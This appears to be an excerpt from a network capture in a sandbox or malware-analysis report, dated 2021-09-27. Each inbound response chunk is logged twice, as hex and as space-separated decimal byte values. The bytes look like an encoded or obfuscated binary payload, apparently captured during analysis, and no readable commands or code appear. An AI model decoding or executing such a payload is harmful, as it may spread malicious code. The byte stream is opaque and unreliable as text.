                                                                                              2021-09-27 18:27:27 UTC68INData Raw: 30 33 20 31 30 38 20 38 38 20 31 35 20 34 39 20 35 30 20 36 30 20 31 32 34 20 35 35 20 31 31 36 20 31 30 39 20 31 31 38 20 39 34 20 37 20 33 39 20 32 39 20 38 33 20 32 34 32 20 35 39 20 31 30 39 20 31 31 32 20 35 34 20 32 37 20 32 33 38 20 37 32 20 32 33 20 31 31 34 20 31 31 37 20 31 30 35 20 33 31 20 31 34 35 20 34 39 20 35 30 20 34 38 20 31 32 37 20 31 31 39 20 39 33 20 31 32 32 20 31 31 33 20 35 30 20 35 34 20 32 34 20 33 37 20 31 30 30 20 31 31 33 20 31 31 37 20 38 34 20 31 31 32 20 35 30 20 34 38 20 31 31 30 20 35 34 20 38 34 20 39 39 20 38 35 20 37 37 20 36 32 20 35 30 20 34 38 20 32 36 20 32 33 32 20 38 34 20 31 31 34 20 31 32 37 20 37 37 20 31 31 33 20 35 30 20 34 38 20 31 37 38 20 34 34 20 31 32 31 20 31 32 30 20 38 33 20 36 39 20 37 39 20 35 31
                                                                                              Data Ascii: 03 108 88 15 49 50 60 124 55 116 109 118 94 7 39 29 83 242 59 109 112 54 27 238 72 23 114 117 105 31 145 49 50 48 127 119 93 122 113 50 54 24 37 100 113 117 84 112 50 48 110 54 84 99 85 77 62 50 48 26 232 84 114 127 77 113 50 48 178 44 121 120 83 69 79 51
                                                                                              2021-09-27 18:27:27 UTC72INData Raw: 38 32 20 38 38 20 31 32 37 20 37 30 20 31 34 36 20 33 33 20 30 20 35 38 20 35 34 20 31 30 38 20 31 31 34 20 31 31 37 20 31 30 39 20 32 33 20 35 30 20 34 38 20 33 35 20 35 33 20 38 30 20 31 31 39 20 39 33 20 34 33 20 31 31 32 20 35 30 20 35 34 20 34 30 20 32 37 20 31 31 35 20 38 34 20 31 31 20 32 33 35 20 31 31 32 20 35 30 20 35 32 20 33 37 20 34 36 20 37 39 20 31 30 36 20 32 34 38 20 33 31 20 31 31 32 20 35 30 20 34 39 20 33 37 20 32 37 20 37 36 20 38 34 20 31 31 34 20 31 32 33 20 31 31 34 20 31 39 30 20 31 32 30 20 35 30 20 35 34 20 38 35 20 32 30 38 20 31 31 34 20 31 32 32 20 31 31 38 20 31 34 34 20 35 35 20 32 36 20 31 34 32 20 38 34 20 31 31 34 20 31 31 35 20 37 31 20 31 32 32 20 32 35 20 32 33 31 20 35 37 20 32 39 20 31 37 38 20 31 31 33 20 36 39 20
                                                                                              Data Ascii: 82 88 127 70 146 33 0 58 54 108 114 117 109 23 50 48 35 53 80 119 93 43 112 50 54 40 27 115 84 11 235 112 50 52 37 46 79 106 248 31 112 50 49 37 27 76 84 114 123 114 190 120 50 54 85 208 114 122 118 144 55 26 142 84 114 115 71 122 25 231 57 29 178 113 69
                                                                                              2021-09-27 18:27:27 UTC76INData Raw: 31 30 33 20 33 31 20 32 33 20 32 30 20 32 32 20 32 31 37 20 31 34 32 20 31 39 38 20 33 35 20 32 32 20 38 37 20 38 36 20 38 37 20 38 30 20 35 30 20 32 33 20 31 36 20 31 31 20 34 31 20 34 39 20 33 39 20 34 36 20 32 37 20 36 35 20 38 34 20 38 35 20 31 33 30 20 31 36 37 20 31 39 39 20 32 34 31 20 38 34 20 38 30 20 34 39 20 32 33 20 31 39 20 31 31 20 32 31 20 38 34 20 38 35 20 31 30 36 20 38 37 20 31 32 36 20 38 34 20 39 34 20 31 38 36 20 38 36 20 32 35 20 32 31 37 20 35 30 20 35 34 20 38 37 20 36 36 20 31 32 37 20 31 30 39 20 39 35 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 31 20 31 30 39 20 34 33 20 32 39 20 31 39 20 31 36 20 38 37 20 31 30 33 20 39 38 20 36 34 20 31 31 30 20 32 30 20 31 36 20 34 38 20 31 36 20 35 32 20 32
                                                                                              Data Ascii: 103 31 23 20 22 217 142 198 35 22 87 86 87 80 50 23 16 11 41 49 39 46 27 65 84 85 130 167 199 241 84 80 49 23 19 11 21 84 85 106 87 126 84 94 186 86 25 217 50 54 87 66 127 109 95 50 48 50 54 84 114 117 111 109 43 29 19 16 87 103 98 64 110 20 16 48 16 52 2
                                                                                              2021-09-27 18:27:27 UTC80INData Raw: 31 20 31 31 39 20 32 30 20 33 33 20 37 37 20 39 35 20 36 30 20 37 35 20 31 31 38 20 33 36 20 36 37 20 39 37 20 35 35 20 38 34 20 31 32 30 20 39 38 20 36 34 20 34 39 20 32 30 20 35 34 20 33 37 20 31 31 31 20 36 36 20 39 34 20 37 32 20 37 35 20 31 31 39 20 35 32 20 39 35 20 31 32 35 20 35 35 20 38 34 20 31 32 30 20 31 32 31 20 37 37 20 31 34 36 20 31 35 38 20 33 31 20 32 38 20 38 30 20 35 30 20 32 33 20 31 39 20 38 20 32 32 20 38 37 20 38 35 20 38 34 20 38 30 20 34 39 20 38 32 20 31 30 35 20 32 30 37 20 35 33 20 32 32 33 20 38 36 20 38 37 20 38 30 20 34 39 20 32 30 20 31 39 20 38 20 32 32 20 38 37 20 38 36 20 38 37 20 38 37 20 38 39 20 31 32 32 20 38 39 20 31 31 39 20 39 31 20 33 34 20 31 37 36 20 31 30 37 20 35 34 20 38 34 20 31 31 38 20 39 34 20 32 32 32
                                                                                              Data Ascii: 1 119 20 33 77 95 60 75 118 36 67 97 55 84 120 98 64 49 20 54 37 111 66 94 72 75 119 52 95 125 55 84 120 121 77 146 158 31 28 80 50 23 19 8 22 87 85 84 80 49 82 105 207 53 223 86 87 80 49 20 19 8 22 87 86 87 87 89 122 89 119 91 34 176 107 54 84 118 94 222
                                                                                              2021-09-27 18:27:27 UTC84INData Raw: 20 35 30 20 35 39 20 31 31 35 20 31 31 36 20 31 30 39 20 31 31 38 20 33 35 20 36 33 20 38 38 20 38 39 20 32 20 31 31 35 20 31 31 37 20 31 30 33 20 31 34 20 31 30 35 20 34 38 20 35 30 20 35 30 20 31 32 30 20 31 32 36 20 31 31 20 35 34 20 31 31 32 20 35 30 20 35 32 20 33 33 20 33 38 20 31 30 38 20 35 20 31 31 37 20 31 30 39 20 31 31 32 20 37 36 20 31 30 38 20 35 30 20 35 34 20 38 30 20 31 30 33 20 37 30 20 31 31 37 20 31 34 20 31 30 34 20 34 38 20 35 30 20 35 30 20 35 39 20 31 31 32 20 31 31 36 20 31 30 39 20 31 31 38 20 31 38 20 31 34 30 20 32 34 32 20 32 30 31 20 31 37 31 20 31 39 20 31 30 30 20 39 38 20 31 37 20 39 30 20 33 35 20 33 35 20 32 39 20 38 33 20 31 32 20 34 31 20 31 30 39 20 31 31 32 20 35 34 20 33 35 20 33 35 20 33 39 20 36 39 20 39 35 20 31
                                                                                              Data Ascii: 50 59 115 116 109 118 35 63 88 89 2 115 117 103 14 105 48 50 50 120 126 11 54 112 50 52 33 38 108 5 117 109 112 76 108 50 54 80 103 70 117 14 104 48 50 50 59 112 116 109 118 18 140 242 201 171 19 100 98 17 90 35 35 29 83 12 41 109 112 54 35 35 39 69 95 1
                                                                                              2021-09-27 18:27:27 UTC88INData Raw: 31 30 34 20 35 37 20 35 33 20 39 32 20 34 33 20 31 33 39 20 31 30 32 20 31 31 33 20 35 30 20 35 31 20 33 36 20 36 20 31 33 31 20 31 31 37 20 31 31 35 20 32 32 37 20 32 35 20 32 38 20 33 35 20 35 33 20 31 38 37 20 31 31 38 20 31 31 34 20 31 31 37 20 31 30 38 20 31 32 35 20 35 32 20 33 38 20 35 39 20 33 32 20 38 33 20 39 30 20 34 33 20 31 30 38 20 31 31 32 20 35 36 20 35 37 20 35 36 20 34 38 20 31 32 36 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 35 20 32 20 35 37 20 35 30 20 34 35 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 34 38 20 33 30 20 32 31 20 31 31 34 20 31 31 37 20 31 30 33 20 31 31 34 20 34 35 20 33 32 20 31 39 31 20 31 37 20 38 34 20 31 31 34 20 31 31 39 20 31 31 39 20 39 33 20 34 39 20 32 32 20 32 30 20 32 38
                                                                                              Data Ascii: 104 57 53 92 43 139 102 113 50 51 36 6 131 117 115 227 25 28 35 53 187 118 114 117 108 125 52 38 59 32 83 90 43 108 112 56 57 56 48 126 114 117 109 115 2 57 50 45 84 114 117 109 112 50 48 48 30 21 114 117 103 114 45 32 191 17 84 114 119 119 93 49 22 20 28
                                                                                              2021-09-27 18:27:27 UTC92INData Raw: 20 32 30 20 35 34 20 33 30 20 31 32 35 20 31 32 37 20 31 31 36 20 31 32 36 20 37 30 20 31 35 31 20 35 36 20 32 37 20 31 39 39 20 34 39 20 31 32 34 20 32 33 33 20 31 31 37 20 31 30 39 20 31 31 38 20 34 32 20 32 39 20 35 37 20 31 36 20 39 32 20 39 30 20 30 20 31 30 39 20 31 31 32 20 35 36 20 32 39 20 35 37 20 32 39 20 38 37 20 31 32 36 20 39 34 20 31 35 38 20 31 32 30 20 32 36 20 33 38 20 35 31 20 35 34 20 38 32 20 31 37 32 20 38 31 20 37 32 20 38 38 20 31 32 36 20 34 38 20 35 30 20 36 30 20 38 39 20 31 31 37 20 39 33 20 32 34 31 20 31 31 32 20 35 30 20 35 34 20 35 39 20 32 32 20 31 36 30 20 38 39 20 31 36 35 20 31 31 35 20 38 38 20 32 30 35 20 34 38 20 35 30 20 34 38 20 31 32 34 20 31 39 38 20 31 31 37 20 31 30 39 20 31 31 38 20 32 36 20 38 31 20 35 30 20
                                                                                              Data Ascii: 20 54 30 125 127 116 126 70 151 56 27 199 49 124 233 117 109 118 42 29 57 16 92 90 0 109 112 56 29 57 29 87 126 94 158 120 26 38 51 54 82 172 81 72 88 126 48 50 60 89 117 93 241 112 50 54 59 22 160 89 165 115 88 205 48 50 48 124 198 117 109 118 26 81 50
                                                                                              2021-09-27 18:27:27 UTC95INData Raw: 34 20 38 39 20 34 38 20 35 30 20 35 30 20 32 31 38 20 31 39 37 20 32 36 20 31 35 20 31 31 33 20 35 30 20 35 38 20 34 37 20 32 37 20 31 31 38 20 38 34 20 31 31 20 36 20 31 31 32 20 35 30 20 35 32 20 33 35 20 35 31 20 32 30 36 20 31 31 31 20 38 38 20 31 31 39 20 38 36 20 37 36 20 39 32 20 35 30 20 35 34 20 38 30 20 39 39 20 31 31 32 20 32 34 37 20 31 32 33 20 37 36 20 37 39 20 35 30 20 35 34 20 39 34 20 31 32 36 20 39 34 20 31 30 32 20 39 39 20 35 34 20 32 37 20 32 35 35 20 33 37 20 38 31 20 38 39 20 31 37 34 20 39 36 20 39 31 20 32 31 34 20 37 38 20 39 35 20 35 34 20 38 34 20 31 31 38 20 31 30 30 20 31 30 35 20 31 34 20 39 35 20 34 38 20 35 30 20 35 30 20 32 31 38 20 31 39 37 20 32 36 20 31 35 20 31 31 33 20 35 30 20 35 38 20 31 36 38 20 35 38 20 39 32 20
                                                                                              Data Ascii: 4 89 48 50 50 218 197 26 15 113 50 58 47 27 118 84 11 6 112 50 52 35 51 206 111 88 119 86 76 92 50 54 80 99 112 247 123 76 79 50 54 94 126 94 102 99 54 27 255 37 81 89 174 96 91 214 78 95 54 84 118 100 105 14 95 48 50 50 218 197 26 15 113 50 58 168 58 92
                                                                                              2021-09-27 18:27:27 UTC100INData Raw: 31 31 35 20 31 31 37 20 31 30 33 20 31 34 20 36 38 20 34 38 20 35 30 20 35 30 20 31 33 32 20 32 32 37 20 31 31 37 20 31 30 39 20 31 31 33 20 32 36 20 31 31 38 20 35 30 20 35 34 20 39 34 20 31 30 39 20 31 32 34 20 32 20 32 39 20 35 31 20 34 38 20 35 36 20 37 32 20 33 34 20 31 31 34 20 31 31 37 20 31 30 35 20 31 36 30 20 31 32 31 20 34 38 20 35 30 20 35 35 20 31 32 34 20 35 32 20 31 31 37 20 31 30 39 20 31 32 32 20 34 35 20 35 38 20 39 33 20 39 31 20 38 35 20 31 31 34 20 31 32 37 20 31 39 20 36 20 35 30 20 34 38 20 35 34 20 32 33 30 20 32 35 33 20 31 31 34 20 31 31 37 20 31 30 38 20 38 38 20 31 31 36 20 34 38 20 35 30 20 36 30 20 37 35 20 31 32 31 20 32 36 20 30 20 31 31 33 20 35 30 20 35 38 20 37 36 20 36 34 20 38 34 20 31 31 34 20 31 31 33 20 31 38 39 20
                                                                                              Data Ascii: 115 117 103 14 68 48 50 50 132 227 117 109 113 26 118 50 54 94 109 124 2 29 51 48 56 72 34 114 117 105 160 121 48 50 55 124 52 117 109 122 45 58 93 91 85 114 127 19 6 50 48 54 230 253 114 117 108 88 116 48 50 60 75 121 26 0 113 50 58 76 64 84 114 113 189
                                                                                              2021-09-27 18:27:27 UTC104INData Raw: 34 30 20 35 34 20 38 34 20 31 31 35 20 34 20 32 31 31 20 31 31 32 20 35 30 20 34 39 20 39 33 20 31 38 31 20 38 35 20 31 31 34 20 31 32 37 20 38 35 20 38 20 35 31 20 34 38 20 35 30 20 37 32 20 33 39 20 31 31 34 20 31 31 37 20 31 30 35 20 31 32 36 20 35 34 20 33 33 20 35 35 20 31 37 32 20 34 35 20 32 30 36 20 31 31 37 20 31 30 39 20 31 31 33 20 36 37 20 31 34 30 20 35 30 20 35 34 20 38 35 20 32 39 20 32 34 31 20 31 30 38 20 31 31 32 20 35 36 20 38 20 31 30 34 20 35 35 20 38 34 20 31 31 34 20 31 31 20 33 30 20 31 31 32 20 35 30 20 35 32 20 36 30 20 35 30 20 36 39 20 31 31 39 20 32 33 39 20 32 30 20 36 36 20 35 30 20 34 38 20 35 31 20 37 31 20 31 30 32 20 31 31 34 20 31 31 37 20 31 30 38 20 31 30 36 20 33 31 20 33 34 20 32 30 20 33 36 20 39 30 20 39 30 20 31
                                                                                              Data Ascii: 40 54 84 115 4 211 112 50 49 93 181 85 114 127 85 8 51 48 50 72 39 114 117 105 126 54 33 55 172 45 206 117 109 113 67 140 50 54 85 29 241 108 112 56 8 104 55 84 114 11 30 112 50 52 60 50 69 119 239 20 66 50 48 51 71 102 114 117 108 106 31 34 20 36 90 90 1
                                                                                              2021-09-27 18:27:27 UTC108INData Raw: 35 34 20 38 35 20 32 39 20 34 36 20 31 30 39 20 31 31 32 20 35 36 20 38 20 33 30 20 35 32 20 38 34 20 31 31 34 20 31 31 20 32 34 20 31 31 32 20 35 30 20 35 32 20 37 36 20 37 31 20 38 34 20 31 31 34 20 31 31 33 20 32 20 31 38 35 20 35 30 20 34 38 20 35 36 20 31 38 36 20 32 34 20 31 31 34 20 31 31 37 20 31 30 38 20 33 31 20 31 30 35 20 34 38 20 35 30 20 36 30 20 31 30 38 20 31 32 34 20 31 31 39 20 31 30 39 20 31 31 32 20 37 36 20 36 39 20 35 30 20 35 34 20 38 30 20 31 32 20 34 20 31 30 39 20 31 31 32 20 35 34 20 39 35 20 31 37 30 20 35 35 20 38 34 20 31 32 30 20 32 34 39 20 33 32 20 31 31 32 20 35 30 20 34 39 20 39 33 20 31 30 39 20 38 34 20 31 31 34 20 31 32 37 20 38 35 20 31 32 38 20 35 31 20 34 38 20 35 30 20 37 32 20 33 33 20 31 31 34 20 31 31 37 20 31
                                                                                              Data Ascii: 54 85 29 46 109 112 56 8 30 52 84 114 11 24 112 50 52 76 71 84 114 113 2 185 50 48 56 186 24 114 117 108 31 105 48 50 60 108 124 119 109 112 76 69 50 54 80 12 4 109 112 54 95 170 55 84 120 249 32 112 50 49 93 109 84 114 127 85 128 51 48 50 72 33 114 117 1
                                                                                              2021-09-27 18:27:27 UTC112INData Raw: 33 20 32 34 20 31 32 36 20 35 34 20 38 34 20 31 32 30 20 31 30 32 20 31 30 36 20 31 31 35 20 37 33 20 33 37 20 35 30 20 35 34 20 38 30 20 39 39 20 31 31 34 20 37 37 20 32 33 33 20 33 30 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 38 38 20 31 32 39 20 34 38 20 35 30 20 34 38 20 31 32 34 20 31 39 20 31 31 37 20 31 30 39 20 31 32 32 20 32 33 36 20 34 38 20 32 34 20 38 39 20 31 39 35 20 35 31 20 31 30 35 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 37 35 20 34 38 20 34 38 20 35 30 20 31 33 20 38 36 20 31 31 34 20 31 31 37 20 37 35 20 31 31 32 20 35 30 20 34 38 20 31 31 36 20 35 34 20 38 34 20 31 31 35 20 31 30 32 20 39 33 20 31 31 36 20 35 30 20 39 39 20 35 30
                                                                                              Data Ascii: 3 24 126 54 84 120 102 106 115 73 37 50 54 80 99 114 77 233 30 224 44 30 171 114 117 107 88 129 48 50 48 124 19 117 109 122 236 48 24 89 195 51 105 109 112 50 48 50 54 84 114 117 109 75 48 48 50 13 86 114 117 75 112 50 48 116 54 84 115 102 93 116 50 99 50
                                                                                              2021-09-27 18:27:27 UTC116INData Raw: 20 31 30 39 20 39 34 20 32 32 36 20 34 36 20 32 36 20 32 30 31 20 38 34 20 31 31 34 20 31 31 35 20 37 37 20 34 38 20 34 35 20 34 38 20 35 30 20 31 38 36 20 32 34 20 31 31 34 20 31 31 37 20 31 30 38 20 38 38 20 39 37 20 34 39 20 35 30 20 34 38 20 34 35 20 36 32 20 31 31 37 20 31 30 39 20 31 31 33 20 36 37 20 31 32 34 20 35 30 20 35 34 20 38 35 20 38 38 20 31 30 32 20 39 33 20 31 31 34 20 35 30 20 32 30 20 35 30 20 35 34 20 38 34 20 31 32 36 20 31 31 37 20 31 30 39 20 39 37 20 31 38 20 33 20 32 38 20 32 33 30 20 37 34 20 39 30 20 31 33 38 20 31 30 39 20 31 31 32 20 35 32 20 31 36 20 32 30 35 20 32 30 31 20 38 34 20 31 31 34 20 32 34 39 20 33 33 20 31 31 32 20 35 30 20 34 39 20 32 36 20 31 30 31 20 38 35 20 31 31 34 20 31 31 35 20 32 30 20 36 30 20 35 30 20
                                                                                              Data Ascii: 109 94 226 46 26 201 84 114 115 77 48 45 48 50 186 24 114 117 108 88 97 49 50 48 45 62 117 109 113 67 124 50 54 85 88 102 93 114 50 20 50 54 84 126 117 109 97 18 3 28 230 74 90 138 109 112 52 16 205 201 84 114 249 33 112 50 49 26 101 85 114 115 20 60 50
                                                                                              2021-09-27 18:27:27 UTC120INData Raw: 35 36 20 31 36 20 38 33 20 32 39 20 31 38 33 20 31 30 38 20 31 31 32 20 35 36 20 32 32 20 35 33 20 35 32 20 35 39 20 31 37 37 20 31 31 36 20 31 30 39 20 31 32 32 20 39 33 20 32 34 34 20 35 31 20 35 34 20 39 34 20 32 39 20 31 38 30 20 31 30 38 20 31 31 32 20 35 36 20 32 32 20 35 33 20 35 32 20 35 39 20 39 33 20 31 31 36 20 31 30 39 20 31 32 32 20 39 33 20 32 34 31 20 35 31 20 35 34 20 39 34 20 38 34 20 31 31 39 20 32 20 36 31 20 35 30 20 34 38 20 35 36 20 32 36 20 37 34 20 38 39 20 31 31 38 20 31 30 32 20 39 31 20 32 34 32 20 35 35 20 39 33 20 32 34 34 20 38 35 20 31 31 34 20 31 32 37 20 37 35 20 31 31 39 20 34 38 20 39 35 20 31 32 37 20 35 34 20 38 34 20 31 32 30 20 39 33 20 34 39 20 31 31 33 20 35 30 20 35 34 20 39 33 20 32 34 37 20 38 35 20 31 31 34 20
                                                                                              Data Ascii: 56 16 83 29 183 108 112 56 22 53 52 59 177 116 109 122 93 244 51 54 94 29 180 108 112 56 22 53 52 59 93 116 109 122 93 241 51 54 94 84 119 2 61 50 48 56 26 74 89 118 102 91 242 55 93 244 85 114 127 75 119 48 95 127 54 84 120 93 49 113 50 54 93 247 85 114
                                                                                              2021-09-27 18:27:27 UTC124INData Raw: 34 20 31 31 35 20 32 30 20 32 32 20 32 34 20 37 35 20 31 39 33 20 31 31 34 20 31 31 37 20 31 30 35 20 39 31 20 32 30 32 20 34 38 20 34 39 20 36 20 39 33 20 31 31 34 20 31 30 36 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 32 20 31 31 39 20 32 32 20 32 33 30 20 35 30 20 34 38 20 35 34 20 35 33 20 31 32 34 20 32 34 37 20 31 31 37 20 31 30 39 20 31 32 32 20 37 30 20 31 32 20 35 30 20 35 34 20 38 36 20 31 31 30 20 38 38 20 31 31 30 20 38 36 20 32 30 20 32 36 20 37 39 20 31 36 30 20 38 34 20 31 31 34 20 31 31 33 20 37 30 20 31 33 36 20 35 30 20 35 31 20 32 20 36 33 20 38 34 20 31 30 39 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 36 20 31 31 32 20 31 34 20 32 35 31 20 31 31 32 20 35 30 20 35 32
                                                                                              Data Ascii: 4 115 20 22 24 75 193 114 117 105 91 202 48 49 6 93 114 106 109 112 50 48 50 54 84 112 119 22 230 50 48 54 53 124 247 117 109 122 70 12 50 54 86 110 88 110 86 20 26 79 160 84 114 113 70 136 50 51 2 63 84 109 117 109 112 50 48 50 54 86 112 14 251 112 50 52
                                                                                              2021-09-27 18:27:27 UTC127INData Raw: 30 20 35 38 20 38 34 20 31 31 34 20 31 30 30 20 31 31 31 20 31 30 39 20 34 31 20 32 39 20 35 33 20 31 36 20 34 37 20 32 31 31 20 31 31 37 20 31 30 39 20 31 31 36 20 32 34 20 32 32 20 32 35 20 31 39 33 20 38 34 20 31 31 33 20 36 39 20 31 30 30 20 31 31 32 20 36 31 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 34 20 34 39 20 33 38 20 33 30 20 35 33 20 31 31 34 20 38 34 20 39 35 20 31 36 20 32 30 39 20 35 30 20 34 38 20 35 34 20 32 39 20 31 37 32 20 31 31 34 20 31 30 32 20 39 33 20 31 31 35 20 35 30 20 36 33 20 35 30 20 35 34 20 38 34 20 31 32 36 20 31 31 37 20 31 30 39 20 39 37 20 34 38 20 33 39 20 33 36 20 32 36 20 38 33 20 38 34 20 31 34 20 32 30 37 20 31 31 32 20 35 30 20 35 32 20 32 34 20 31 36 20 31 32 37 20 31 33 33
                                                                                              Data Ascii: 0 58 84 114 100 111 109 41 29 53 16 47 211 117 109 116 24 22 25 193 84 113 69 100 112 61 48 50 54 84 114 117 109 114 49 38 30 53 114 84 95 16 209 50 48 54 29 172 114 102 93 115 50 63 50 54 84 126 117 109 97 48 39 36 26 83 84 14 207 112 50 52 24 16 127 133
                                                                                              2021-09-27 18:27:27 UTC132INData Raw: 35 34 20 38 34 20 31 31 34 20 31 31 32 20 31 31 36 20 39 33 20 35 38 20 32 32 20 33 36 20 33 32 20 31 32 30 20 31 31 36 20 38 33 20 37 30 20 37 39 20 36 33 20 32 37 20 31 39 36 20 35 38 20 31 32 37 20 31 33 38 20 31 32 34 20 31 30 31 20 32 33 34 20 34 36 20 32 39 20 36 32 20 31 36 20 38 32 20 32 39 20 36 34 20 31 30 39 20 31 31 32 20 35 36 20 34 30 20 31 20 31 39 20 31 32 37 20 31 31 33 20 31 32 37 20 37 30 20 31 33 30 20 34 38 20 37 35 20 31 36 36 20 35 34 20 38 34 20 31 31 38 20 31 30 32 20 31 30 35 20 39 37 20 35 34 20 32 38 20 35 36 20 33 39 20 38 30 20 31 31 32 20 31 31 38 20 31 30 37 20 33 31 20 32 34 32 20 34 39 20 35 30 20 34 38 20 38 36 20 31 31 36 20 31 31 33 20 32 20 32 33 34 20 35 31 20 34 38 20 35 32 20 32 33 32 20 32 33 20 31 32 32 20 39 38
                                                                                              Data Ascii: 54 84 114 112 116 93 58 22 36 32 120 116 83 70 79 63 27 196 58 127 138 124 101 234 46 29 62 16 82 29 64 109 112 56 40 1 19 127 113 127 70 130 48 75 166 54 84 118 102 105 97 54 28 56 39 80 112 118 107 31 242 49 50 48 86 116 113 2 234 51 48 52 232 23 122 98
                                                                                              2021-09-27 18:27:27 UTC136INData Raw: 37 20 31 30 37 20 31 37 34 20 35 38 20 33 33 20 35 32 20 33 30 20 32 32 32 20 31 31 34 20 31 31 37 20 31 30 33 20 31 37 32 20 32 33 36 20 39 36 20 34 38 20 37 37 20 32 30 37 20 31 31 34 20 31 31 37 20 31 30 35 20 39 39 20 35 33 20 33 33 20 35 33 20 32 36 20 37 31 20 39 39 20 31 31 34 20 31 31 31 20 31 31 36 20 39 33 20 32 30 39 20 35 31 20 35 34 20 39 34 20 31 20 31 35 37 20 31 30 38 20 31 31 32 20 35 36 20 39 35 20 32 35 34 20 35 35 20 38 34 20 31 31 36 20 31 31 39 20 32 20 32 31 31 20 35 31 20 34 38 20 35 32 20 32 33 32 20 31 32 35 20 38 37 20 39 33 20 33 33 20 31 31 32 20 35 30 20 35 38 20 35 37 20 35 32 20 34 37 20 32 33 33 20 31 31 37 20 31 30 39 20 31 31 36 20 33 33 20 35 35 20 33 35 20 34 39 20 31 32 30 20 31 32 33 20 31 30 30 20 31 30 36 20 31 31
                                                                                              Data Ascii: 7 107 174 58 33 52 30 222 114 117 103 172 236 96 48 77 207 114 117 105 99 53 33 53 26 71 99 114 111 116 93 209 51 54 94 1 157 108 112 56 95 254 55 84 116 119 2 211 51 48 52 232 125 87 93 33 112 50 58 57 52 47 233 117 109 116 33 55 35 49 120 123 100 106 11
                                                                                              2021-09-27 18:27:27 UTC140INData Raw: 20 31 34 20 31 39 35 20 31 31 32 20 35 30 20 35 32 20 33 30 20 33 36 20 38 36 20 39 20 32 31 39 20 31 30 39 20 31 31 32 20 35 34 20 39 35 20 32 33 36 20 35 35 20 38 34 20 31 32 30 20 31 31 39 20 31 32 31 20 31 33 20 31 35 36 20 34 38 20 35 30 20 35 30 20 38 36 20 39 20 32 31 38 20 31 30 39 20 31 31 32 20 35 34 20 32 38 20 33 32 20 35 32 20 34 37 20 32 32 31 20 31 31 37 20 31 30 39 20 31 31 36 20 39 33 20 32 33 38 20 35 31 20 35 34 20 39 34 20 31 31 32 20 39 37 20 31 36 20 32 32 33 20 35 30 20 34 38 20 35 34 20 35 32 20 34 37 20 31 39 34 20 31 31 37 20 31 30 39 20 31 31 36 20 33 30 20 33 34 20 34 38 20 37 37 20 32 32 38 20 31 31 34 20 31 31 37 20 31 30 35 20 33 31 20 32 33 36 20 34 39 20 35 30 20 36 30 20 38 36 20 31 30 32 20 38 20 32 32 31 20 31 31 32 20
                                                                                              Data Ascii: 14 195 112 50 52 30 36 86 9 219 109 112 54 95 236 55 84 120 119 121 13 156 48 50 50 86 9 218 109 112 54 28 32 52 47 221 117 109 116 93 238 51 54 94 112 97 16 223 50 48 54 52 47 194 117 109 116 30 34 48 77 228 114 117 105 31 236 49 50 60 86 102 8 221 112
                                                                                              2021-09-27 18:27:27 UTC144INData Raw: 31 30 32 20 32 30 39 20 35 33 20 32 31 31 20 32 31 34 20 32 33 32 20 31 30 38 20 31 39 30 20 32 35 34 20 31 37 38 20 32 30 30 20 36 37 20 33 32 20 32 30 37 20 31 34 35 20 32 30 38 20 35 39 20 31 38 33 20 32 31 30 20 31 35 38 20 31 32 37 20 32 30 37 20 34 31 20 31 33 36 20 31 31 37 20 31 36 20 39 36 20 35 34 20 32 30 36 20 32 31 33 20 31 36 35 20 31 35 31 20 32 32 38 20 31 32 30 20 31 35 30 20 32 30 30 20 31 33 34 20 32 30 38 20 33 20 32 30 37 20 31 37 36 20 32 32 38 20 33 34 20 35 32 20 31 32 33 20 32 33 35 20 32 30 39 20 32 31 20 31 36 30 20 31 36 31 20 32 30 33 20 31 31 33 20 32 33 37 20 31 38 35 20 31 33 30 20 32 33 20 31 32 31 20 31 31 38 20 31 33 30 20 33 38 20 31 32 35 20 31 34 31 20 31 34 39 20 37 37 20 31 32 20 31 34 32 20 32 33 32 20 32 37 20 31
                                                                                              Data Ascii: 102 209 53 211 214 232 108 190 254 178 200 67 32 207 145 208 59 183 210 158 127 207 41 136 117 16 96 54 206 213 165 151 228 120 150 200 134 208 3 207 176 228 34 52 123 235 209 21 160 161 203 113 237 185 130 23 121 118 130 38 125 141 149 77 12 142 232 27 1
                                                                                              2021-09-27 18:27:27 UTC148INData Raw: 35 39 20 32 30 38 20 31 33 37 20 31 34 39 20 31 32 30 20 31 34 31 20 31 34 39 20 31 35 32 20 38 39 20 32 30 34 20 37 34 20 31 31 37 20 37 30 20 31 30 33 20 31 38 30 20 31 32 38 20 33 30 20 31 37 35 20 32 31 30 20 31 34 32 20 33 31 20 33 38 20 38 32 20 31 38 34 20 32 34 31 20 35 34 20 32 34 33 20 38 33 20 31 39 37 20 32 32 34 20 31 32 32 20 31 34 33 20 31 34 35 20 32 31 30 20 32 32 31 20 32 34 39 20 31 38 34 20 32 33 38 20 37 38 20 32 34 30 20 38 36 20 32 31 38 20 34 38 20 34 35 20 32 34 36 20 31 38 31 20 32 33 36 20 37 37 20 33 39 20 31 30 32 20 32 30 31 20 31 32 36 20 32 33 35 20 32 30 39 20 32 33 30 20 31 37 30 20 33 30 20 32 32 30 20 35 36 20 36 34 20 32 34 33 20 36 32 20 31 33 34 20 38 35 20 31 31 35 20 31 35 30 20 31 33 31 20 39 31 20 31 31 34 20 31
                                                                                              Data Ascii: 59 208 137 149 120 141 149 152 89 204 74 117 70 103 180 128 30 175 210 142 31 38 82 184 241 54 243 83 197 224 122 143 145 210 221 249 184 238 78 240 86 218 48 45 246 181 236 77 39 102 201 126 235 209 230 170 30 220 56 64 243 62 134 85 115 150 131 91 114 1
